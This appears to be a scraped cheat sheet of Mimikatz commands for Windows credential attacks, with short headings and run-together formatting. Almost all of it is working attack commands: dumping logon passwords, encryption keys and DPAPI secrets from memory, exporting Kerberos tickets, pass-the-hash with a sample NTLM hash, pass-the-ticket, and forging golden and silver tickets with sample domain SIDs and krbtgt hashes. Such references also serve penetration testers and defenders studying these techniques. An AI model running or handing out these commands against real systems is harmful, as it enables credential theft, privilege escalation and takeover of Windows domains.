Mimikatz
Enable debug privileges
privilege::debugsekurlsa
Extract credentials from the system's memory
sekurlsa::logonpasswordssekurlsa::logonPasswords fulldump and export Kerberos tickets from memory
sekurlsa::tickets /exportPass the hash - PTH
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmdkerberos
dump and export Kerberos tickets from memory associated with active user sessions
kerberos::list /exportPass the ticket - PTT
kerberos::ptt c:\chocolate.kirbiCreate a Golden Ticket
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbiTGT
Interact with and manipulate Kerberos tickets
kerberosekeys
Dump encryption keys from the system's memory
sekurlsa::ekeysDPAPI
Extract and decrypt credentials protected by DPAPI (Data Protection API) from memory
sekurlsa::dpapiSilver / Golden Ticket
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbikerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi Last updated